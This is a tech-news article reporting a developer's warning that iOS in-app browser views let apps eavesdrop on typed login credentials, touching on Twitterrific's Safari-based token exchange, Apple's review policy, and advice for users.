App developer Craig Hockenberry has published an article today titled “in-app browsers considered harmful” warning both devs and users of security issues related to apps that take advantage of the feature. “Would it surprise you to know that every one of those apps could eavesdrop on your typing? Even when it’s in a secure login screen with a password field?”
The best 4K & 5K displays for Mac
Many apps send users to an in-app browser to do things like authenticate logins for associated services. Think logging into an app using your Facebook or Twitter credentials as highlighted in the proof of concept video above. You might assume that would be as safe as doing so through Safari, but Hockenberry notes that, unlike Safari, it’s relatively easy for someone to exploit the feature to capture username and password data:
The report adds that the technique was tested on iOS 7 and iOS 8. Hockenberry says that is the reason his company’s app Twitterrific “did its token exchange in Safari, even though it’s a more complex user interaction and a more difficult technical implementation.” That, however, isn’t something required by Apple’s app review procedures and users might feel an in-app browser view is as secure as Safari.
Unfortunately, Apple’s current App Review policy does not agree with this recommendation or with Twittterrific’s previous implementation. This is why our update for iOS 8 was delayed—it was the first time since the launch of the App Store that we haven’t had a new version on release day.
The article doesn’t provide any clear recommendations for Apple to remedy the issue and notes “Apple would need to release a new version of iOS for each version that included Safari and WebKit” to fix core issue in WebKit and UIWebView. “No, this is not a WebKit bug… The problem is that an iOS app has as much access to these technologies as the developer of the web page.”
For now, Hockenberry suggests users avoid typing sensitive username or password information in an in-app browser view.